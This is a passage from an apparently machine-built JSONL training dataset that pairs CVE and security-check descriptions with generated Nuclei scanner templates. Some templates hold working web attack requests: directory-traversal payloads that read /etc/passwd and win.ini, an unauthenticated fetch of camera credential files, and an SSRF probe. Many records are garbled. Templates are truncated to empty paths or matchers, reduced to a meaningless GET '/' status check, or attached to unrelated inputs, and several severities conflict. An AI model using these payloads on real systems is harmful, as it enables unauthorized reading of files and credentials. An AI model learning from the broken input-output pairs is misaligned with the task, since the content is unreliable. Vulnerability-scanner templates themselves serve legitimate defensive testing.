path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-22527"} +{"instruction": "Generate a Nuclei template for CVE-2023-4151", "input": "Title: Unknown Vulnerability in agilelogix store_locator\nSummary: The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: agilelogix store_locator\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-4151\n\ninfo:\n name: Store Locator WordPress < 1.4.13 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n tags: cve,cve2024,wp,wordpress,wp-plugin,agile-store-locator,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/plugins/agile-store-locator\" \n part: body\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body_2\n - type: word\n words:\n - \"text/html\" \n part: content_type_2\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-4151"} +{"instruction": "Generate a Nuclei template for: MobileIron Security Checks", "input": "Title: MobileIron Security Checks\nSummary: MobileIron Security Checks. A simple workflow that runs all MobileIron related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: mobileiron-workflow\n\ninfo:\n name: MobileIron Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all MobileIron related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "mobileiron-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2017-1000353", "input": "Title: Deserialization of Untrusted Data in jenkins jenkins and others\nSummary: Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: jenkins jenkins, oracle communications_cloud_native_core_automated_test_suite\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-1000353\n\ninfo:\n name: Jenkins CLI - Java Deserialization\n author: hnd3884\n severity: critical\n description: Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\n tags: cve,cve2017,jenkins,rce,vkev,kev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-1000353"} +{"instruction": "Generate a Nuclei template for: o2 phishing Detection", "input": "Title: o2 phishing Detection\nSummary: o2 phishing Detection. A o2 phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: o2-mobile-phish\n\ninfo:\n name: o2 phishing Detection\n author: rxerium\n severity: info\n description: A o2 phishing website was detected\n tags: phishing,o2,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"O2 | Phone, SIM & Tech Deals - See What You Can Do\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "o2-mobile-phish"} +{"instruction": "Generate a Nuclei template for CVE-2017-8229", "input": "Title: Vulnerability (CWE-255) in amcrest ipm-721s_firmware\nSummary: Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials. If the firmware version V2.420.AC00.16.R 9/9/2016 is dissected using binwalk tool, one obtains a _user-x.squashfs.img.extracted archive which contains the filesystem set up on the device that many of the binaries in the /usr folder. The binary \"sonia\" is the one that has the vulnerable function that sets up the default credentials on the device. If one opens this binary in IDA-pro one will notice that this follows a ARM little endian format. The function sub_436D6 in IDA pro is identified to be setting up the configuration for the device. If one scrolls to the address 0x000437C2 then one can see that /current_config is being set as an ALIAS for /mnt/mtd/Config folder on the device. If one TELNETs into the device and navigates to /mnt/mtd/Config folder, one can observe that it contains various files such as Account1, Account2, SHAACcount1, etc. This means that if one navigates to http://[IPofcamera]/current_config/Sha1Account1 then one should be able to view the content of the files. The security researchers assumed that this was only possible only after authentication to the device. However, when unauthenticated access tests were performed for the same URL as provided above, it was observed that the device file could be downloaded without any authentication.\nVulnerability Type: Vulnerability (CWE-255)\nSeverity: critical\nAffected Products: amcrest ipm-721s_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-8229\n\ninfo:\n name: Amcrest IP Camera Web Management - Data Exposure\n author: pussycat0x\n severity: critical\n description: Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n tags: cve2017,cve,packetstorm,seclists,amcrest,iot,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/current_config/Sha1Account1\" \n matchers:\n - type: word\n words:\n - \"DevInformation\" \n - \"SerialID\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/octet-stream\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-8229"} +{"instruction": "Generate a Nuclei template for: Cross DB Ownership Chaining Enabled in SQL Server Database Instances", "input": "Title: Cross DB Ownership Chaining Enabled in SQL Server Database Instances\nSummary: Cross DB Ownership Chaining Enabled in SQL Server Database Instances. Ensure that the \"cross db ownership chaining\" database flag is disabled for your Google Cloud SQL Server database instances. This flag, when enabled, can potentially introduce security risks by allowing cross-database access without explicit permissions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-sql-cross-db-ownership-chaining-enabled\n\ninfo:\n name: Cross DB Ownership Chaining Enabled in SQL Server Database Instances\n author: princechaddha\n severity: medium\n description: Ensure that the \"cross db ownership chaining\" database flag is disabled for your Google Cloud SQL Server database instances. This flag, when enabled, can potentially introduce security risks by allowing cross-database access without explicit permissions.\n tags: cloud,devops,gcp,gcloud,google-cloud-sql,sqlserver,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-sql-cross-db-ownership-chaining-enabled"} +{"instruction": "Generate a Nuclei template for: Maximum Password Age Set Too High or Unlimited", "input": "Title: Maximum Password Age Set Too High or Unlimited\nSummary: Maximum Password Age Set Too High or Unlimited. Checks if the maximum password age allows passwords to be used indefinitely.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: max-password-age-too-high\n\ninfo:\n name: Maximum Password Age Set Too High or Unlimited\n author: princechaddha\n severity: medium\n description: Checks if the maximum password age allows passwords to be used indefinitely.\n tags: policy,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "max-password-age-too-high"} +{"instruction": "Generate a Nuclei template for CVE-2015-3648", "input": "Title: Path Traversal in montala resourcespace\nSummary: Directory traversal vulnerability in pages/setup.php in Montala Limited ResourceSpace before 7.2.6727 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the defaultlanguage parameter.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: montala resourcespace\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-3648\n\ninfo:\n name: ResourceSpace - Local File inclusion\n author: pikpikcu\n severity: high\n description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.\n tags: cve2015,cve,lfi,resourcespace,packetstorm,montala,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2015-3648"} +{"instruction": "Generate a Nuclei template for CVE-2023-28662", "input": "Title: SQL Injection in codemenschen gift_vouchers\nSummary: The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: codemenschen gift_vouchers\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-28662\n\ninfo:\n name: Wordpress Gift Cards <= 4.3.1 - SQL Injection\n author: xxcdd\n severity: critical\n description: The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.\n tags: time-based-sqli,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Gift Vouchers and Packages\" \n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-28662"} +{"instruction": "Generate a Nuclei template for: Google Speed Limit API Test", "input": "Title: Google Speed Limit API Test\nSummary: Google Speed Limit API Test. Tags: token-spray, google, speed\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googlespeedlimit\n\ninfo:\n name: Google Speed Limit API Test\n author: zzeitlin\n severity: info\n description: Google Speed Limit API Test\n tags: token-spray,google,speed,limit\n\nhttp:\n - method: GET\n path:\n - \"https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}\" \n matchers:\n - type: word\n words:\n - \"error\" \n part: body", "category": "generic", "severity": "info", "id": "api-googlespeedlimit"} +{"instruction": "Generate a Nuclei template for CVE-2024-6928", "input": "Title: SQL Injection in opti.marketing opti_marketing\nSummary: The Opti Marketing WordPress plugin through 2.0.9 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: opti.marketing opti_marketing\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-6928\n\ninfo:\n name: Opti Marketing <= 2.0.9 - SQL Injection\n author: s4e-io\n severity: high\n description: The Opti Marketing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-6928"} +{"instruction": "Generate a Nuclei template for: Azure Redis Cache TLS Version Not Latest", "input": "Title: Azure Redis Cache TLS Version Not Latest\nSummary: Azure Redis Cache TLS Version Not Latest. Ensure that all your Microsoft Azure Redis Cache servers are using the latest available version of TLS encryption protocol in order to enhance the security of the SSL/TLS connection between the cache servers and their web applications, and comply with the industry standards.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-redis-tls-version-outdated\n\ninfo:\n name: Azure Redis Cache TLS Version Not Latest\n author: princechaddha\n severity: medium\n description: Ensure that all your Microsoft Azure Redis Cache servers are using the latest available version of TLS encryption protocol in order to enhance the security of the SSL/TLS connection between the cache servers and their web applications, and comply with the industry standards.\n tags: cloud,devops,azure,microsoft,redis,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-redis-tls-version-outdated"} +{"instruction": "Generate a Nuclei template for CVE-2024-42640", "input": "Title: Unrestricted File Upload in CVE-2024-42640\nSummary: angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-42640\n\ninfo:\n name: Angular-Base64-Upload - Remote Code Execution\n author: s4e-io\n severity: critical\n description: angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\n tags: cve,cve2024,angular,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-42640"} +{"instruction": "Generate a Nuclei template for CVE-2019-12593", "input": "Title: Path Traversal in icewarp mail_server\nSummary: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: icewarp mail_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-12593\n\ninfo:\n name: IceWarp Mail Server <=10.4.4 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n tags: cve,cve2019,packetstorm,lfi,icewarp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini\" \n - \"{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd\" \n matchers:\n - type: word\n words:\n - \"[intl]\" \n - \"root:x:0\" \n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-12593"} +{"instruction": "Generate a Nuclei template for: GitList Security Checks", "input": "Title: GitList Security Checks\nSummary: GitList Security Checks. A simple workflow that runs all GitList related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gitlist-workflow\n\ninfo:\n name: GitList Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all GitList related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "gitlist-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2023-31446", "input": "Title: Vulnerability (CWE-77) in cassianetworks xc1000_firmware and others\nSummary: In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: cassianetworks xc1000_firmware, cassianetworks xc2000_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-31446\n\ninfo:\n name: Cassia Gateway Firmware - Remote Code Execution\n author: DhiyaneshDk\n severity: critical\n description: In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n tags: cve,cve2023,rce,cassia,gateway,cassianetworks,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex", "category": "cve", "severity": "critical", "id": "CVE-2023-31446"} +{"instruction": "Generate a Nuclei template for: CloudTrail Logs Not Encrypted", "input": "Title: CloudTrail Logs Not Encrypted\nSummary: CloudTrail Logs Not Encrypted. Ensure Amazon CloudTrail logs are encrypted at rest using AWS Key Management Service (KMS) to secure log data.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: cloudtrail-logs-not-encrypted\n\ninfo:\n name: CloudTrail Logs Not Encrypted\n author: princechaddha\n severity: medium\n description: Ensure Amazon CloudTrail logs are encrypted at rest using AWS Key Management Service (KMS) to secure log data.\n tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "cloudtrail-logs-not-encrypted"} +{"instruction": "Generate a Nuclei template for: Suprema BioStar 2 Panel - Detect", "input": "Title: Suprema BioStar 2 Panel - Detect\nSummary: Suprema BioStar 2 Panel - Detect. Tags: panel, login, biostar\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: suprema-biostar-panel\n\ninfo:\n name: Suprema BioStar 2 Panel - Detect\n author: ritikchaddha\n severity: info\n description: Suprema BioStar 2 Panel - Detect\n tags: panel,login,biostar,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/#/login\" \n matchers:\n - type: word\n words:\n - \"BioStar 2\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "suprema-biostar-panel"} +{"instruction": "Generate a Nuclei template for: Apache ActiveMQ Artemis Console Default Login", "input": "Title: Apache ActiveMQ Artemis Console Default Login\nSummary: Apache ActiveMQ Artemis Console Default Login. Apache ActiveMQ Artemis console default login credentials were discovered.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: activemq-artemis-default-login\n\ninfo:\n name: Apache ActiveMQ Artemis Console Default Login\n author: pdteam\n severity: high\n description: Apache ActiveMQ Artemis console default login credentials were discovered.\n tags: apache,activemq,artemis,default-login,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/console/auth/login\" \n matchers:\n - type: word\n words:\n - \"{\"credentials\"\"", "category": "generic", "severity": "high", "id": "activemq-artemis-default-login"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: content-scheme\n\ninfo:\n name: Android Content Scheme - Detect\n author: gaurang\n severity: info\n description: Android content scheme enabling was detected.\n tags: android,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: SMB - Enumeration", "input": "Title: SMB - Enumeration\nSummary: SMB - Enumeration. SMS Information Extraction is a sophisticated and efficient system designed to retrieve critical information from a remote computer or device through short text messages. This technology enables users to remotely access essential details about a computer, such as its operating system (OS) version, computer name, and hostname,\nall via SMS communication.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: smb-enum\n\ninfo:\n name: SMB - Enumeration\n author: pussycat0x\n severity: info\n description: SMS Information Extraction is a sophisticated and efficient system designed to retrieve critical information from a remote computer or device through short text messages. This technology enables users to remotely access essential details about a computer, such as its operating system (OS) version, computer name, and hostname,\nall via SMS communication.\n tags: js,network,smb,enum,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "smb-enum"} +{"instruction": "Generate a Nuclei template for: macOS World-Readable TTY Devices", "input": "Title: macOS World-Readable TTY Devices\nSummary: macOS World-Readable TTY Devices. Checks if TTY devices are readable by all users, potentially allowing session snooping.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: insecure-tty-permissions\n\ninfo:\n name: macOS World-Readable TTY Devices\n author: geeknik\n severity: medium\n description: Checks if TTY devices are readable by all users, potentially allowing session snooping.\n tags: macos,audit,local,security,tty\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "insecure-tty-permissions"} +{"instruction": "Generate a Nuclei template for: Detect .dockercfg", "input": "Title: Detect .dockercfg\nSummary: Detect .dockercfg. Docker registry authentication data\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: dockercfg-config\n\ninfo:\n name: Detect .dockercfg\n author: geeknik\n severity: high\n description: Docker registry authentication data\n tags: docker,exposure,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.dockercfg\" \n - \"{{BaseURL}}/.docker/config.json\" \n matchers:\n - type: word\n words:\n - \"\"email\":\" \n - \"\"auth\":\" \n condition: and\n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "dockercfg-config"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Taobao Suggest", "input": "Title: Content-Security-Policy Bypass - Taobao Suggest\nSummary: Content-Security-Policy Bypass - Taobao Suggest. Tags: xss, csp-bypass, taobao-suggest\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: taobao-suggest-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Taobao Suggest\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Taobao Suggest\n tags: xss,csp-bypass,taobao-suggest,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"taobao.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "taobao-suggest-csp-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2012-4940", "input": "Title: Path Traversal in gecad axigen_free_mail_server\nSummary: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: gecad axigen_free_mail_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2012-4940\n\ninfo:\n name: Axigen Mail Server Filename Directory Traversal\n author: dhiyaneshDk\n severity: medium\n description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.\n tags: cve,cve2012,edb,axigen,lfi,mail,gecad,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini\" \n - \"{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini\" \n matchers:\n - type: word\n words:\n - \"bit app support\" \n - \"fonts\" \n - \"extensions\" \n part: body\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2012-4940"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: livemasterru\n\ninfo:\n name: Livemaster.ru User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Livemaster.ru user name information check was conducted.\n tags: osint,osint-shopping,livemasterru,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.livemaster.ru/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\u041c\u0430\u0433\u0430\u0437\u0438\u043d \u043c\u0430\u0441\u0442\u0435\u0440\u0430\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Hikvison iVMS - File Upload Bypass", "input": "Title: Hikvison iVMS - File Upload Bypass\nSummary: Hikvison iVMS - File Upload Bypass. Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the \"/resourceOperations/upload\" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: hikvision-ivms-file-upload-bypass\n\ninfo:\n name: Hikvison iVMS - File Upload Bypass\n author: SleepingBag945\n severity: critical\n description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the \"/resourceOperations/upload\" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.\n tags: hikvision,ivms,intrusive,fileupload,auth-bypass,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"success\":true\" \n - \"\"resourceName\":\" \n part: body\n condition: and", "category": "generic", "severity": "critical", "id": "hikvision-ivms-file-upload-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2024-50334", "input": "Title: Vulnerability (CWE-288) in erudika scoold\nSummary: Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type: application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.\nVulnerability Type: Vulnerability (CWE-288)\nSeverity: medium\nAffected Products: erudika scoold\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-50334\n\ninfo:\n name: Scoold < 1.64.0 - Authentication Bypass\n author: xbow,iamnoooob,pdresearch\n severity: medium\n description: Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type- application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.\n tags: cve,cve2024,scoold,info-leak,erudika,auth-bypass,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2024-50334"} +{"instruction": "Generate a Nuclei template for CVE-2024-29030", "input": "Title: Vulnerability (CWE-918) in usememos memos\nSummary: memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /api/resource that allows authenticated users to enumerate the internal network. Version 0.22.0 of memos removes the vulnerable file.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nAffected Products: usememos memos\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-29030\n\ninfo:\n name: Memos 0.13.2 - Server-Side Request Forgery\n author: ritikchaddha\n severity: medium\n description: An SSRF vulnerability exists at the `/api/resource` that allows authenticated users to enumerate the internal network.\n tags: cve,cve2024,xss,memos,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/o/get/resource?url=https://{{interactsh-url}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2024-29030"} +{"instruction": "Generate a Nuclei template for CVE-2023-37979", "input": "Title: Cross-Site Scripting (XSS) in ninjaforms ninja_forms\nSummary: Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <=\u00a03.6.25 versions.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: ninjaforms ninja_forms\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-37979\n\ninfo:\n name: Ninja Forms < 3.6.26 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected 